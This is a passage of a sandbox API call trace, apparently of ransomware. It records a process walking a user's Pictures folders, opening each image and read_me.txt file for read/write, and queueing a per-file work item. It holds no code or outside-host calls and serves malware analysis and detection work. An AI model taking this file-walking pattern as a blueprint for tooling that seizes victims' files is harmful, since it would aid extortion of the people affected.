ftLastAccessTime.dwHighDateTime=0x1d4d397, ftLastWriteTime.dwLowDateTime=0x661101a0, ftLastWriteTime.dwHighDateTime=0x1d4d397, nFileSizeHigh=0x0, nFileSizeLow=0xcb9b, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="be4I D.png", cAlternateFileName="BE4ID~1.PNG")) returned 1 [0079.126] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\be4I D.png") returned 72 [0079.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\be4I D.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dm428cqynnkrlc2awq\\be4i d.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x908 [0079.127] QueueUserWorkItem (Function=0x404e00, Context=0x908, Flags=0x0) returned 1 [0079.127] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x467f8aa0, ftCreationTime.dwHighDateTime=0x1d4d5a9, ftLastAccessTime.dwLowDateTime=0x16dbaa70, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16dbaa70, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="Gy7pNjw6e4Np", cAlternateFileName="GY7PNJ~1")) returned 1 [0079.127] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np") returned 74 [0079.127] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56b41dc0, ftCreationTime.dwHighDateTime=0x1d4cad0, ftLastAccessTime.dwLowDateTime=0x29c2deb0, ftLastAccessTime.dwHighDateTime=0x1d4d08d, ftLastWriteTime.dwLowDateTime=0x29c2deb0, ftLastWriteTime.dwHighDateTime=0x1d4d08d, nFileSizeHigh=0x0, nFileSizeLow=0x666a, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="K3Ng.png", cAlternateFileName="")) returned 1 [0079.127] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\K3Ng.png") returned 70 [0079.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\K3Ng.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dm428cqynnkrlc2awq\\k3ng.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90c [0079.127] QueueUserWorkItem (Function=0x404e00, Context=0x90c, Flags=0x0) returned 1 [0079.127] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8eff8a00, ftCreationTime.dwHighDateTime=0x1d4d3b5, ftLastAccessTime.dwLowDateTime=0xfa47bfb0, ftLastAccessTime.dwHighDateTime=0x1d4c70f, ftLastWriteTime.dwLowDateTime=0xfa47bfb0, ftLastWriteTime.dwHighDateTime=0x1d4c70f, nFileSizeHigh=0x0, nFileSizeLow=0x1566f, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="kxGpk6t.jpg", cAlternateFileName="")) returned 1 [0079.127] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\kxGpk6t.jpg") returned 73 [0079.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\kxGpk6t.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dm428cqynnkrlc2awq\\kxgpk6t.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x910 [0079.127] QueueUserWorkItem (Function=0x404e00, Context=0x910, Flags=0x0) returned 1 [0079.127] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x689ab7f0, ftCreationTime.dwHighDateTime=0x1d4c79d, ftLastAccessTime.dwLowDateTime=0x16e52ff0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16e52ff0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="Qr0Sm9_VPLPJ92NjOJl", cAlternateFileName="QR0SM9~1")) returned 1 [0079.127] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Qr0Sm9_VPLPJ92NjOJl") returned 81 [0079.127] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16e9f2b0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16e9f2b0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16e9f2b0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0079.127] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\read_me.txt") returned 73 [0079.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dm428cqynnkrlc2awq\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x914 [0079.127] QueueUserWorkItem (Function=0x404e00, Context=0x914, Flags=0x0) returned 1 [0079.127] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb57db0, ftCreationTime.dwHighDateTime=0x1d4c959, ftLastAccessTime.dwLowDateTime=0x16e52ff0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16e52ff0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="UQtrMj-c8", cAlternateFileName="UQTRMJ~1")) returned 1 [0079.127] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\UQtrMj-c8") returned 71 [0079.127] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2769bf0, ftCreationTime.dwHighDateTime=0x1d4c9dd, ftLastAccessTime.dwLowDateTime=0x4d620ed0, ftLastAccessTime.dwHighDateTime=0x1d4c6b1, ftLastWriteTime.dwLowDateTime=0x4d620ed0, ftLastWriteTime.dwHighDateTime=0x1d4c6b1, nFileSizeHigh=0x0, nFileSizeLow=0x5006, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="V1HBrDH3U9zXmyoOM.png", cAlternateFileName="V1HBRD~1.PNG")) returned 1 [0079.128] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\V1HBrDH3U9zXmyoOM.png") returned 83 [0079.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\V1HBrDH3U9zXmyoOM.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dm428cqynnkrlc2awq\\v1hbrdh3u9zxmyoom.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x918 [0079.128] QueueUserWorkItem (Function=0x404e00, Context=0x918, Flags=0x0) returned 1 [0079.128] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2769bf0, ftCreationTime.dwHighDateTime=0x1d4c9dd, ftLastAccessTime.dwLowDateTime=0x4d620ed0, ftLastAccessTime.dwHighDateTime=0x1d4c6b1, ftLastWriteTime.dwLowDateTime=0x4d620ed0, ftLastWriteTime.dwHighDateTime=0x1d4c6b1, nFileSizeHigh=0x0, nFileSizeLow=0x5006, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="v1hbrdh3u9zxmyoom.png", cAlternateFileName="V1HBRD~1.PNG")) returned 0 [0079.128] FindClose (in: hFindFile=0x2b2478 | out: hFindFile=0x2b2478) returned 1 [0079.128] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\read_me.txt") returned 73 [0079.128] GetProcessHeap () returned 0x280000 [0079.128] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b20008 | out: hHeap=0x280000) returned 1 [0079.128] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 70 [0079.128] GetProcessHeap () returned 0x280000 [0079.128] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bd0048 | out: hHeap=0x280000) returned 1 [0079.128] GetProcessHeap () returned 0x280000 [0079.128] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8bd0048 [0079.128] wnsprintfW (in: pszDest=0x8bd0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\*") returned 76 [0079.128] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\*", lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x467f8aa0, ftCreationTime.dwHighDateTime=0x1d4d5a9, ftLastAccessTime.dwLowDateTime=0x16dbaa70, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16dbaa70, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b2478 [0079.128] wnsprintfW (in: pszDest=0x8bd0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\.") returned 76 [0079.128] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x467f8aa0, ftCreationTime.dwHighDateTime=0x1d4d5a9, ftLastAccessTime.dwLowDateTime=0x16dbaa70, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16dbaa70, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0079.128] wnsprintfW (in: pszDest=0x8bd0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\..") returned 77 [0079.128] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39f031e0, ftCreationTime.dwHighDateTime=0x1d4cb72, ftLastAccessTime.dwLowDateTime=0x3b0e6100, ftLastAccessTime.dwHighDateTime=0x1d4c8de, ftLastWriteTime.dwLowDateTime=0x3b0e6100, ftLastWriteTime.dwHighDateTime=0x1d4c8de, nFileSizeHigh=0x0, nFileSizeLow=0xff13, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="94HmrfDqmA1V4iUM.gif", cAlternateFileName="94HMRF~1.GIF")) returned 1 [0079.128] wnsprintfW (in: pszDest=0x8bd0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\94HmrfDqmA1V4iUM.gif") returned 95 [0079.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\94HmrfDqmA1V4iUM.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dm428cqynnkrlc2awq\\gy7pnjw6e4np\\94hmrfdqma1v4ium.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x91c [0079.129] QueueUserWorkItem (Function=0x404e00, Context=0x91c, Flags=0x0) returned 1 [0079.129] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf456fa30, ftCreationTime.dwHighDateTime=0x1d4c840, ftLastAccessTime.dwLowDateTime=0xac17b340, ftLastAccessTime.dwHighDateTime=0x1d4cf98, ftLastWriteTime.dwLowDateTime=0xac17b340, ftLastWriteTime.dwHighDateTime=0x1d4cf98, nFileSizeHigh=0x0, nFileSizeLow=0xa330, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="ChPZGc.bmp", cAlternateFileName="")) returned 1 [0079.129] wnsprintfW (in: pszDest=0x8bd0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\ChPZGc.bmp") returned 85 [0079.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\ChPZGc.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dm428cqynnkrlc2awq\\gy7pnjw6e4np\\chpzgc.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x920 [0079.129] QueueUserWorkItem (Function=0x404e00, Context=0x920, Flags=0x0) returned 1 [0079.129] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb10adc10, ftCreationTime.dwHighDateTime=0x1d4cead, ftLastAccessTime.dwLowDateTime=0xb21dce0, ftLastAccessTime.dwHighDateTime=0x1d4cce6, ftLastWriteTime.dwLowDateTime=0xb21dce0, ftLastWriteTime.dwHighDateTime=0x1d4cce6, nFileSizeHigh=0x0, nFileSizeLow=0x7a99, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="fSja09t2aNq-k0i.jpg", cAlternateFileName="FSJA09~1.JPG")) returned 1 [0079.129] wnsprintfW (in: pszDest=0x8bd0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\fSja09t2aNq-k0i.jpg") returned 94 [0079.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\fSja09t2aNq-k0i.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dm428cqynnkrlc2awq\\gy7pnjw6e4np\\fsja09t2anq-k0i.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x924 [0079.129] QueueUserWorkItem (Function=0x404e00, Context=0x924, Flags=0x0) returned 1 [0079.129] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1ddbfe0, ftCreationTime.dwHighDateTime=0x1d4d342, ftLastAccessTime.dwLowDateTime=0xdcced030, ftLastAccessTime.dwHighDateTime=0x1d4ce4a, ftLastWriteTime.dwLowDateTime=0xdcced030, ftLastWriteTime.dwHighDateTime=0x1d4ce4a, nFileSizeHigh=0x0, nFileSizeLow=0xefc0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="gSFkrUC0ZU.bmp", cAlternateFileName="GSFKRU~1.BMP")) returned 1 [0079.129] wnsprintfW (in: pszDest=0x8bd0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\gSFkrUC0ZU.bmp") returned 89 [0079.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\gSFkrUC0ZU.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dm428cqynnkrlc2awq\\gy7pnjw6e4np\\gsfkruc0zu.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x928 [0079.129] QueueUserWorkItem (Function=0x404e00, Context=0x928, Flags=0x0) returned 1 [0079.129] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6fb1fa0, ftCreationTime.dwHighDateTime=0x1d4cd93, ftLastAccessTime.dwLowDateTime=0xd1e80ed0, ftLastAccessTime.dwHighDateTime=0x1d4d2ef, ftLastWriteTime.dwLowDateTime=0xd1e80ed0, ftLastWriteTime.dwHighDateTime=0x1d4d2ef, nFileSizeHigh=0x0, nFileSizeLow=0x12573, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="n2SkM9U-A3pP.jpg", cAlternateFileName="N2SKM9~1.JPG")) returned 1 [0079.129] wnsprintfW (in: pszDest=0x8bd0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\n2SkM9U-A3pP.jpg") returned 91 [0079.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\n2SkM9U-A3pP.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dm428cqynnkrlc2awq\\gy7pnjw6e4np\\n2skm9u-a3pp.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x92c [0079.130] QueueUserWorkItem (Function=0x404e00, Context=0x92c, Flags=0x0) returned 1 [0079.130] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16dbaa70, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16dbaa70, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16dbaa70, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0079.130] wnsprintfW (in: pszDest=0x8bd0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\read_me.txt") returned 86 [0079.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dm428cqynnkrlc2awq\\gy7pnjw6e4np\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x930 [0079.130] QueueUserWorkItem (Function=0x404e00, Context=0x930, Flags=0x0) returned 1 [0079.130] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e748a30, ftCreationTime.dwHighDateTime=0x1d4cee3, ftLastAccessTime.dwLowDateTime=0x16dbaa70, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16dbaa70, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="vTT7imMuS", cAlternateFileName="VTT7IM~1")) returned 1 [0079.130] wnsprintfW (in: pszDest=0x8bd0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\vTT7imMuS") returned 84 [0079.130] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93792fe0, ftCreationTime.dwHighDateTime=0x1d4c970, ftLastAccessTime.dwLowDateTime=0xb5f113e0, ftLastAccessTime.dwHighDateTime=0x1d4c9a1, ftLastWriteTime.dwLowDateTime=0xb5f113e0, ftLastWriteTime.dwHighDateTime=0x1d4c9a1, nFileSizeHigh=0x0, nFileSizeLow=0x12794, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="wKd-.png", cAlternateFileName="")) returned 1 [0079.130] wnsprintfW (in: pszDest=0x8bd0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\wKd-.png") returned 83 [0079.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\wKd-.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dm428cqynnkrlc2awq\\gy7pnjw6e4np\\wkd-.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x934 [0079.130] QueueUserWorkItem (Function=0x404e00, Context=0x934, Flags=0x0) returned 1 [0079.130] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4e3a5d0, ftCreationTime.dwHighDateTime=0x1d4c7d0, ftLastAccessTime.dwLowDateTime=0x656fc350, ftLastAccessTime.dwHighDateTime=0x1d4cedb, ftLastWriteTime.dwLowDateTime=0x656fc350, ftLastWriteTime.dwHighDateTime=0x1d4cedb, nFileSizeHigh=0x0, nFileSizeLow=0x7bba, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="ZyVgo1Pf_yAFI_.bmp", cAlternateFileName="ZYVGO1~1.BMP")) returned 1 [0079.130] wnsprintfW (in: pszDest=0x8bd0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\ZyVgo1Pf_yAFI_.bmp") returned 93 [0079.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\ZyVgo1Pf_yAFI_.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dm428cqynnkrlc2awq\\gy7pnjw6e4np\\zyvgo1pf_yafi_.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x938 [0079.130] QueueUserWorkItem (Function=0x404e00, Context=0x938, Flags=0x0) returned 1 [0079.130] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4e3a5d0, ftCreationTime.dwHighDateTime=0x1d4c7d0, ftLastAccessTime.dwLowDateTime=0x656fc350, ftLastAccessTime.dwHighDateTime=0x1d4cedb, ftLastWriteTime.dwLowDateTime=0x656fc350, ftLastWriteTime.dwHighDateTime=0x1d4cedb, nFileSizeHigh=0x0, nFileSizeLow=0x7bba, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="zyvgo1pf_yafi_.bmp", cAlternateFileName="ZYVGO1~1.BMP")) returned 0 [0079.130] FindClose (in: hFindFile=0x2b2478 | out: hFindFile=0x2b2478) returned 1 [0079.131] wnsprintfW (in: pszDest=0x8bd0048, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\read_me.txt") returned 86 [0079.131] GetProcessHeap () returned 0x280000 [0079.131] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bd0048 | out: hHeap=0x280000) returned 1 [0079.131] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 71 [0079.131] GetProcessHeap () returned 0x280000 [0079.131] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf1060 | out: hHeap=0x280000) returned 1 [0079.131] SetFilePointerEx (in: hFile=0x868, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.131] ReadFile (in: hFile=0x868, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, 